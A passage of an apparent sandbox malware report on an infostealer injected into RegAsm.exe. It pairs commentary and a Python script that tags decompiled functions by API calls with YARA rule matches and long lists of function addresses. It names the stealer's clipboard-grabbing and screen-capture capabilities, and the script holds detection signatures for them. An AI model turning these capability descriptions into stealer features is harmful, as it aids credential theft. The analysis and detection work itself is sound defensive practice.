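The three rows above are the only ones in this listing that name the APIs a function calls, and they describe two stealer capabilities: 24_2_00431530 reads the clipboard (OpenClipboard, GetClipboardData, GlobalLock) and 3_2_00418AB0 takes a screenshot (GetDesktopWindow, CreateCompatibleBitmap, BitBlt). Both sit in the 0x400000 image range that the report's unpack rows (29.2.RegAsm.exe.400000.1) identify as the payload injected into RegAsm.exe. The NtQueryVirtualMemory rows under System Summary are weaker evidence: memory introspection is also what allocators and loaders do, and those functions live at 0x6CBxxxxx, the range the report elsewhere ties to the dropped mozglue.dll (the 0x6CBBD000 dump listed next to mozglue[1].dll), so they are more likely NSS library code than stealer logic. The script below is an added example, not part of the report or of any sandbox tooling; it parses rows of this exact format, including the hundreds of bare "address address" rows, and tags functions with capabilities using signature sets that are an assumption of the example.

```python
"""Tag sandbox 'Code function' rows with capabilities by the Win32 APIs they call.
Added example; not part of the report or of any sandbox vendor's tooling."""
import re
from collections import defaultdict

CODE_ROW = re.compile(
    r"^Source: (?P<image>\S+) Code function: "
    r"(?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]+)"
    r"(?: (?P<apis>[A-Za-z0-9_]+(?:,[A-Za-z0-9_]+)*),)?"  # absent on bare rows
    r" \d+_\d+_[0-9A-Fa-f]+$")

# Assumed signatures: a function earns a tag when it calls every API in the set.
CAPABILITIES = {
    "clipboard_read": {"OpenClipboard", "GetClipboardData"},
    "screen_capture": {"GetDesktopWindow", "CreateCompatibleBitmap", "BitBlt"},
    "memory_introspection": {"NtQueryVirtualMemory"},
}

# Constructed sample: four API-chain rows and two bare rows copied from the report.
SAMPLE = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 24_2_00431530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00418AB0 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 3_2_00418AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBAB8C0 rand_s,NtQueryVirtualMemory, 3_2_6CBAB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB4F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 3_2_6CB4F280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB435A0 3_2_6CB435A0
Source: C:\Users\userFBKFCFBFID.exe Code function: 18_2_014D0B20 18_2_014D0B20
"""


def parse_code_rows(text):
    """One dict per row: image basename, process index, address, called APIs."""
    funcs = []
    for line in text.splitlines():
        m = CODE_ROW.match(line)
        if not m:
            continue
        funcs.append({
            "image": m["image"].rsplit("\\", 1)[-1],
            "pid": int(m["pid"]),
            "addr": int(m["addr"], 16),
            "apis": m["apis"].split(",") if m["apis"] else [],
        })
    return funcs


def tags_for(apis):
    called = set(apis)
    return sorted(name for name, needed in CAPABILITIES.items() if needed <= called)


def capability_map(text):
    """(process index, image) -> {capability: [function addresses]}; bare rows and
    functions matching no signature are dropped, which is most of the listing."""
    out = defaultdict(lambda: defaultdict(list))
    for f in parse_code_rows(text):
        for cap in tags_for(f["apis"]):
            out[(f["pid"], f["image"])][cap].append(f["addr"])
    return {key: dict(caps) for key, caps in out.items()}


if __name__ == "__main__":
    for (pid, image), caps in sorted(capability_map(SAMPLE).items()):
        for cap, addrs in caps.items():
            print(f"{pid:>3} {image:12} {cap:21} " + ", ".join(f"0x{a:08X}" for a in addrs))
```

Requiring the full API set rather than a single call keeps the tagging honest: OpenClipboard followed by CloseClipboard is ordinary UI code, while OpenClipboard together with GetClipboardData is what a wallet-address clipper or a credential grabber needs. When extending the signature table, keep the address ranges in mind as well, since a hit inside a dropped legitimate DLL says little about the payload.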

System Summary

Source: 29.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 29.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 27.2.userIEHDAFHDHC.exe.38b5570.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 27.2.userIEHDAFHDHC.exe.38b5570.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: Process Memory Space: userIEHDAFHDHC.exe PID: 7444, type: MEMORYSTR Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: file.exe, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 192000
Source: userFBKFCFBFID.exe.3.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 308224
Source: 66cf818156193_ldjfnsfd[1].exe.3.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 308224
Source: userIEHDAFHDHC.exe.3.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 176128
Source: 66cf75d3791d7_vrewqgq[1].exe.3.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 176128
Source: DHCGHDHIDH.exe.29.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 308224
Source: HDAFIIDAKJ.exe.29.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 176128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBAB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 3_2_6CBAB700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBAB8C0 rand_s,NtQueryVirtualMemory, 3_2_6CBAB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBAB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 3_2_6CBAB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB4F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 3_2_6CB4F280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA1B8C0 NtQueryVirtualMemory, 29_2_6CA1B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA1B910 NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlRestoreLastWin32Error,GetLastError, 29_2_6CA1B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA1B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlRestoreLastWin32Error, 29_2_6CA1B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9BF280 NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlRestoreLastWin32Error, 29_2_6C9BF280
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01740B20 0_2_01740B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB435A0 3_2_6CB435A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBA34A0 3_2_6CBA34A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBAC4A0 3_2_6CBAC4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB56C80 3_2_6CB56C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB86CF0 3_2_6CB86CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB4D4E0 3_2_6CB4D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB6D4D0 3_2_6CB6D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB564C0 3_2_6CB564C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBB542B 3_2_6CBB542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB85C10 3_2_6CB85C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB92C10 3_2_6CB92C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBBAC00 3_2_6CBBAC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBB545C 3_2_6CBB545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB55440 3_2_6CB55440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBA85F0 3_2_6CBA85F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB80DD0 3_2_6CB80DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB70512 3_2_6CB70512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB6ED10 3_2_6CB6ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB5FD00 3_2_6CB5FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBA4EA0 3_2_6CBA4EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB65E90 3_2_6CB65E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBAE680 3_2_6CBAE680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB4BEF0 3_2_6CB4BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB5FEF0 3_2_6CB5FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBB76E3 3_2_6CBB76E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBA9E30 3_2_6CBA9E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB87E10 3_2_6CB87E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB95600 3_2_6CB95600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB4C670 3_2_6CB4C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBB6E63 3_2_6CBB6E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB69E50 3_2_6CB69E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB83E50 3_2_6CB83E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB64640 3_2_6CB64640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB92E4E 3_2_6CB92E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB977A0 3_2_6CB977A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB76FF0 3_2_6CB76FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB4DFE0 3_2_6CB4DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB87710 3_2_6CB87710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB59F00 3_2_6CB59F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB760A0 3_2_6CB760A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB6C0E0 3_2_6CB6C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB858E0 3_2_6CB858E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBB50C7 3_2_6CBB50C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB8B820 3_2_6CB8B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB94820 3_2_6CB94820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB57810 3_2_6CB57810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB8F070 3_2_6CB8F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB68850 3_2_6CB68850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB6D850 3_2_6CB6D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB7D9B0 3_2_6CB7D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB4C9A0 3_2_6CB4C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB85190 3_2_6CB85190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBA2990 3_2_6CBA2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB9B970 3_2_6CB9B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBBB170 3_2_6CBBB170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB5D960 3_2_6CB5D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB6A940 3_2_6CB6A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB5CAB0 3_2_6CB5CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBB2AB0 3_2_6CBB2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB422A0 3_2_6CB422A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB74AA0 3_2_6CB74AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBBBA90 3_2_6CBBBA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB61AF0 3_2_6CB61AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB8E2F0 3_2_6CB8E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB88AC0 3_2_6CB88AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB89A60 3_2_6CB89A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB4F380 3_2_6CB4F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBB53C8 3_2_6CBB53C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB8D320 3_2_6CB8D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB5C370 3_2_6CB5C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB45340 3_2_6CB45340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CC4ECD0 3_2_6CC4ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBEECC0 3_2_6CBEECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CCB6C00 3_2_6CCB6C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBFAC60 3_2_6CBFAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CCCAC30 3_2_6CCCAC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBF4DB0 3_2_6CBF4DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CD7CDC0 3_2_6CD7CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CC86D90 3_2_6CC86D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CD1AD50 3_2_6CD1AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CCBED70 3_2_6CCBED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CD78D20 3_2_6CD78D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CC90EC0 3_2_6CC90EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CC76E90 3_2_6CC76E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBFAEC0 3_2_6CBFAEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CC8EE70 3_2_6CC8EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CCD0E20 3_2_6CCD0E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBFEFB0 3_2_6CBFEFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CCCEFF0 3_2_6CCCEFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBF0FE0 3_2_6CBF0FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CD38FB0 3_2_6CD38FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CC5EF40 3_2_6CC5EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBF6F10 3_2_6CBF6F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CCB2F70 3_2_6CCB2F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CD30F20 3_2_6CD30F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CCF68E0 3_2_6CCF68E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CCC4840 3_2_6CCC4840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CC40820 3_2_6CC40820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CC7A820 3_2_6CC7A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CD0C9E0 3_2_6CD0C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CC249F0 3_2_6CC249F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CC809A0 3_2_6CC809A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CCAA9A0 3_2_6CCAA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CCB09B0 3_2_6CCB09B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CC28960 3_2_6CC28960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CC46900 3_2_6CC46900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CC6EA80 3_2_6CC6EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CC6CA70 3_2_6CC6CA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CC9EA00 3_2_6CC9EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CCA8A30 3_2_6CCA8A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CBF8BAC 3_2_6CBF8BAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CCF6BE0 3_2_6CCF6BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CC90BA0 3_2_6CC90BA0
Source: C:\Users\userFBKFCFBFID.exe Code function: 18_2_014D0B20 18_2_014D0B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0043681D 24_2_0043681D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0040CC80 24_2_0040CC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0040C69D 24_2_0040C69D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041E850 24_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0043B050 24_2_0043B050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0042D056 24_2_0042D056
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0042285E 24_2_0042285E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00408870 24_2_00408870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00409810 24_2_00409810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00430035 24_2_00430035
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0042E8D7 24_2_0042E8D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0043E080 24_2_0043E080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_004020AD 24_2_004020AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041F8B7 24_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00436150 24_2_00436150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00420970 24_2_00420970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00415172 24_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0043F9E0 24_2_0043F9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0042D9EB 24_2_0042D9EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00408190 24_2_00408190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0043D9AD 24_2_0043D9AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_004211B0 24_2_004211B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0042C9B7 24_2_0042C9B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00405A40 24_2_00405A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00429A49 24_2_00429A49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00426206 24_2_00426206
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0042BADA 24_2_0042BADA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0042A2DC 24_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_004122E6 24_2_004122E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0042E2AC 24_2_0042E2AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00420360 24_2_00420360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00411B6E 24_2_00411B6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00424B70 24_2_00424B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00401330 24_2_00401330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00427B30 24_2_00427B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_004323DD 24_2_004323DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_004063E0 24_2_004063E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00407B80 24_2_00407B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0040DB90 24_2_0040DB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0043E390 24_2_0043E390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00425B9D 24_2_00425B9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_004223B5 24_2_004223B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0043DC70 24_2_0043DC70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00404C20 24_2_00404C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0042F4C7 24_2_0042F4C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0040D4D0 24_2_0040D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00435CD0 24_2_00435CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041A4EA 24_2_0041A4EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00433D5E 24_2_00433D5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0040F578 24_2_0040F578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0040A500 24_2_0040A500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0042C521 24_2_0042C521
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00420D30 24_2_00420D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00431530 24_2_00431530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00428535 24_2_00428535
